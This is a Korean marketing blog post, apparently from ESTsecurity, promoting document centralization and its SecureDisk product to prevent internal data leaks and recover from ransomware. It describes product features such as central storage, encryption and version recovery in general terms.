&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;왜 문서보안 사고는 반복될까요?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;많은 기업이 이미 보안 솔루션을 도입했음에도 불구하고 사고가 반복되는 이유는 명확합니다. 문서를 보호하려 했을 뿐, 문서를 통제하는 구조를 만들지 못했기 때문입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;아직도 다음과 같은 방식으로 문서를 관리하고 있다면, 보안 사고 가능성은 언제든 현실이 될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;개인 PC에 업무 문서 저장&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;파일 서버&amp;middot;NAS 중심의 단순 공유&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;메신저&amp;middot;이메일&amp;middot;웹하드를 통한 자료 전달&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;반출은 사용자 판단에 의존&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 환경에서는 문서가 어디에 저장되어 있는지 파악하기 어렵고, 누가 어떤 파일을 복사하거나 외부로 전달했는지 추적하기도 쉽지 않습니다. 접근 권한을 설정했다 하더라도 캡처, 출력, 복사, 외부 첨부와 같은 실제 유출 행위까지 통제하기에는 구조적인 한계가 존재합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;기존 문서 관리 방식의 한계&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서가 개인 PC와 여러 저장소에 분산되어 있을수록, 보안 리스크는 기하급수적으로 커집니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서 위치 파악 불가 &amp;rarr; 관리 사각지대 발생&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;반출&amp;middot;복사&amp;middot;캡처 이력 추적 어려움&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어 감염 시 전사 확산 위험&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;ISMS&amp;middot;보안 감사 대응 시 로그 부족&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 랜섬웨어 공격은 단 한 번의 감염으로 파일 서버와 개인 PC 전체를 동시에 위협할 수 있어, 분산된 문서 관리 환경에서는 피해 복구조차 쉽지 않습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;문서보안의 기준이 바뀌고 있습니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이제 문서보안은 단순한 암호화나 접근 제한의 문제가 아닙니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;lsquo;누가 열 수 있는가&amp;rsquo;보다 &amp;lsquo;어디에 저장되고, 어떻게 사용되는가&amp;rsquo;를 관리하는 단계로 진화하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;여기서 핵심이 되는 개념이 바로 문서중앙화(Document Centralization)입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;문서중앙화란 무엇이 다를까요?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서중앙화 기반 보안 환경에서는 모든 업무 문서를 개인 PC가 아닌 중앙 서버에 저장합니다. 사용자는 기존과 동일한 윈도우 탐색기 환경에서 문서를 열고 편집하지만, 데이터는 기업의 통제 영역 안에서만 관리됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이를 통해 다음과 같은 보안 구조를 구현할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;사용자 PC로의 문서 저장 원천 차단&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;USB&amp;middot;웹메일&amp;middot;메신저&amp;middot;웹하드 등 외부 반출 통제&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;프로그램&amp;middot;확장자&amp;middot;행위 단위의 세밀한 제어&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서 생성&amp;middot;열람&amp;middot;수정&amp;middot;이동 전 과정 로그 관리&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;즉, 사고가 발생한 이후 대응하는 방식이 아니라 사고가 발생할 수 없는 구조를 만드는 것이 문서중앙화의 핵심입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;보안을 강화하면 업무가 불편해질까요?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서보안에서 자주 나오는 우려 중 하나는 &amp;lsquo;업무 효율 저하&amp;rsquo;입니다. 하지만 실제로는 반대의 결과를 가져오는 경우가 많습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서중앙화 환경에서는 아래와 같은 것들이&amp;nbsp;가능해 보안과 협업 효율을 동시에 확보할 수 있습니다.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;부서별&amp;middot;프로젝트별 협업 공간 구성&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;승인 기반 반출 프로세스를 통한 안전한 외부 공유&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서 버전 관리 및 이력 자동 저장&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;사용자 실수&amp;middot;랜섬웨어 발생 시 빠른 복구&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보안을 이유로 불편해진 환경은 오히려 비인가 공유와 우회 경로를 만들지만, 통제된 협업 구조는 자연스럽게 보안 수준을 끌어올립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;문서중앙화 기반 문서보안, 이렇게 구현됩니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;문서중앙화가 실제 보안 환경에서 어떻게 작동하는지 궁금하신 분들을 위해, 이스트시큐리티의 문서중앙화 기반 문서보안 솔루션&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/product/securedisk&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;b&gt;시큐어디스크&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;가 제공하는 핵심 특장점을 중심으로 살펴보겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;시큐어디스크 특장점&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;시큐어디스크는 문서중앙화를 통해 내부자료 유출.유실 방지 및 통합관리가 가능한 차세대 문서 보안솔루션입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2514&quot; data-origin-height=&quot;1088&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/k8MwX/dJMcagK4A0c/25wrsWN3qIodgtbkA8UAF0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/k8MwX/dJMcagK4A0c/25wrsWN3qIodgtbkA8UAF0/img.png&quot; data-alt=&quot;[이미지] 시큐어디스크&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/k8MwX/dJMcagK4A0c/25wrsWN3qIodgtbkA8UAF0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fk8MwX%2FdJMcagK4A0c%2F25wrsWN3qIodgtbkA8UAF0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2514&quot; height=&quot;1088&quot; data-origin-width=&quot;2514&quot; data-origin-height=&quot;1088&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 시큐어디스크&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;① 내부 자료 유출, 구조적으로 차단&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;시큐어디스크는 사용자가 생성하거나 수정하는 모든 업무 문서를 &lt;b&gt;자동으로 중앙 서버로 이관&amp;middot;저장&lt;/b&gt;합니다. 개인 PC에는 문서 원본이 남지 않도록 설계되어 있어, 퇴사&amp;middot;이직&amp;middot;실수 등 내부 요인으로 인한 자료 유출 가능성을 근본적으로 제거합니다. USB, 외장 저장매체 등 로컬 저장을 차단함으로써 &amp;ldquo;사용자 판단에 맡기는 보안&amp;rdquo;에서 벗어난 구조적 통제가 가능합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;② 서버&amp;middot;전송 구간 암호화로 데이터 보호 강화&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서보안은 저장 위치뿐 아니라 이동 경로까지 함께 보호되어야 합니다. 시큐어디스크는 &lt;b&gt;전송 구간과 서버 저장 영역 모두 암호화&lt;/b&gt;를 적용해, 네트워크 도청이나 물리적 디스크 유출, 해킹 시도에 의한 데이터 탈취 위험을 최소화합니다. 중앙 서버에 문서를 모아두더라도 보안 수준이 낮아지지 않도록 설계된 구조입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;③ 랜섬웨어&amp;middot;실수에도 대비하는 문서 버전 관리&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어 감염이나 사용자 실수로 인한 파일 변경&amp;middot;삭제는 문서 유실로 직결되기 쉽습니다. 시큐어디스크는 모든 문서를 버전 단위로 자동 관리해, 특정 시점 이전 상태로 손쉽게 복원할 수 있습니다. 이는 사고 발생 이후의 대응이 아니라, 사고를 전제로 한 실질적인 복구 전략을 가능하게 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;④ 조직 구조에 맞춘 협업 디스크 구성&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보안이 강화될수록 협업이 불편해진다는 인식을 바꾸는 지점이 바로 협업 디스크 설계입니다. 시큐어디스크는 인사 DB와 연동된 조직도 기반 디스크를 생성해 부서별 문서 관리와 권한 설정을 자동화할 수 있으며, 필요에 따라 프로젝트 단위의 협업 디스크를 유연하게 구성할 수 있습니다. 이를 통해 보안 통제와 업무 효율을 동시에 만족시키는 협업 환경을 구현합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이처럼 시큐어디스크는 단순히 문서를 한 곳에 모아두는 솔루션이 아니라, 저장 &amp;rarr; 사용 &amp;rarr; 공유 &amp;rarr; 복구까지 문서 생명주기 전체를 통제하는 구조를 제공합니다. 문서보안을 &amp;lsquo;추가 기능&amp;rsquo;이 아닌 &amp;lsquo;업무 인프라의 기본 조건&amp;rsquo;으로 가져가고자 하는 조직이라면, 문서중앙화 기반 접근을 진지하게 고려해볼 필요가 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;문서보안, 이제는 &amp;lsquo;구조&amp;rsquo;를 점검할 때입니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;결국 문서보안의 본질은 문서를 잠그는 것이 아니라, 문서를 기업의 자산으로 관리하는 구조를 만드는 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서가 여전히 개인 PC와 개인 판단에 맡겨져 있다면, 보안은 언제든지 우연에 의존할 수밖에 없습니다. 지금 우리 조직의 문서 관리 방식이 사고를 예방하는 구조인지, 아니면 사고가 나지 않기를 바라고 있는 상태인지 점검해야 할 시점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티는 문서중앙화 기반 문서보안 환경을 통해 내부 정보 유출과 랜섬웨어 위협으로부터 기업의 핵심 자산을 보호할 수 있는 현실적인 대안을 제시합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;문서보안, 이제는 관리가 아니라 통제의 문제입니다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;기업 문서 자산을 근본적으로 보호하는 방법을 고민하고 계시다면, 지금의 문서 관리 구조부터 다시 살펴보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/q9moU/dJMcajubGnu/X5HLbWUaqOM75xVVrOkmPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fq9moU%2FdJMcajubGnu%2FX5HLbWUaqOM75xVVrOkmPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;70&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>기업문서보안</category>
      <category>기업보안</category>
      <category>데이터보안</category>
      <category>문서보안</category>
      <category>문서보안솔루션</category>
      <category>문서유출</category>
      <category>문서중앙화</category>
      <category>보안동향</category>
      <category>시큐어디스크</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
